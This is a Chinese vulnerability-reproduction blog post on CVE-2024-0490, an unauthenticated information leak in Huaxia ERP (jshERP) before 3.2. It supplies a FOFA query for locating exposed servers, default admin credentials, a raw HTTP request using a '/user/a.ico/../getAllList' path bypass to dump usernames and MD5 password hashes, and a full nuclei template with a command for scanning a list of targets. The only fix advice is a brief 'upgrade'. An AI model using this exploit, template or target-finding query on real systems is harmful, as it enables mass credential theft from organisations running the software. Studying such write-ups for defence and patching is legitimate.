[漏洞复现]CVE-2024-0490

admin 2024年2月1日22:41:00评论102 views字数 2368阅读7分53秒阅读模式

使

福利:小编整理了大量电子书和护网常用工具,在文末免费获取。

01

漏洞名称

华夏ERP getAllList信息泄露漏洞

02

漏洞影响

华夏ERP < 3.2版本

官网https://www.huaxiaerp.com/githubhttps://github.com/jishenghua/jshERP

[漏洞复现]CVE-2024-0490

03

漏洞描述

华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,攻击者可以通过特定ULR获取系统账号密码。

04

FOFA搜索语句
body="jshERP-boot"

[漏洞复现]CVE-2024-0490

05

靶场搭建

官方有教程,我直接把地址粘贴过来,但记得下载版本< 3.2

需要用户手册请访问这里 

https://www.huaxiaerp.com/thread-393-1-1.html

喜欢视频教程可以看这里

https://space.bilibili.com/540003552/channel/series

为方便大家搭建运行环境,分享了下载地址

https://pan.baidu.com/s/1jlild9uyGdQ7H2yaMx76zw  提取码:814g

不会打包的小伙伴,请下载此打包后的文件

https://share.weiyun.com/NDJNLhry 密码:vd3aig

不会部署的小伙伴,请参考部署教程

http://www.huaxiaerp.com/thread-177-1-1.html

部署后登录系统的默认租户账号:jsh,默认超管账户:admin,默认密码均为:123456

06

漏洞复现

向靶场发送如下数据包

GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1Host: 192.168.40.130:100User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36Connection: closeAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8Accept-Language: ensec-ch-ua-platform: WindowsAccept-Encoding: gzip

[漏洞复现]CVE-2024-0490

漏洞复现成功

返回body中loginName为用户名,password是MD5加密

[漏洞复现]CVE-2024-0490

07

nuclei poc

poc文件内容如下

id: CVE-2024-0490info:  name: 华夏ERP getAllList信息泄露漏洞  author: fgz  severity: high  description: '华夏ERP基于SpringBoot框架和SaaS模式,立志为中小企业提供开源好用的ERP软件,目前专注进销存+财务功能。主要模块有零售管理、采购管理、销售管理、仓库管理、财务管理、报表查询、系统管理等。支持预付款、收入支出、仓库调拨、组装拆卸、订单等特色功能。拥有库存状况、出入库统计等报表。同时对角色和权限进行了细致全面控制,精确到每个按钮和菜单。该系统存在信息泄露漏洞,攻击者可以通过特定ULR获取系统账号密码。'  reference:    - https://github.com/laoquanshi/puppy/blob/main/Logic%20loopholes%20in%20Huaxia%20ERP%20can%20lead%20to%20unauthorized%20access.md    - https://vuldb.com/?ctiid.250595  classification:    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N    cvss-score: 5.3    cve-id: CVE-2024-0490    cwe-id: CWE-200  metadata:    max-request: 3    fofa-query: body="jshERP-boot"    verified: true  tags: cve,cve2024,leak,jshERPhttp:  - method: GET    path:      - "{{BaseURL}}/jshERP-boot/user/a.ico/../getAllList"    headers:      Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8      sec-ch-ua-platform: "Windows"    matchers:      - type: word        words:          - "username"          - "password"          - "loginName"        condition: and    extractors:      - type: json        part: body        json:          - ".data.userList"

运行POC

nuclei.exe -t mypoc华夏erpCVE-2024-0490.yaml -l datahuaxia-erp.txt

[漏洞复现]CVE-2024-0490

POC直接打印出关键信息了

08

修复建议

升级到最新版本。

09

原文始发于微信公众号(AI与网安):[漏洞复现]CVE-2024-0490

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月1日22:41:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   [漏洞复现]CVE-2024-0490https://cn-sec.com/archives/2401732.html

发表评论

匿名网友 填写信息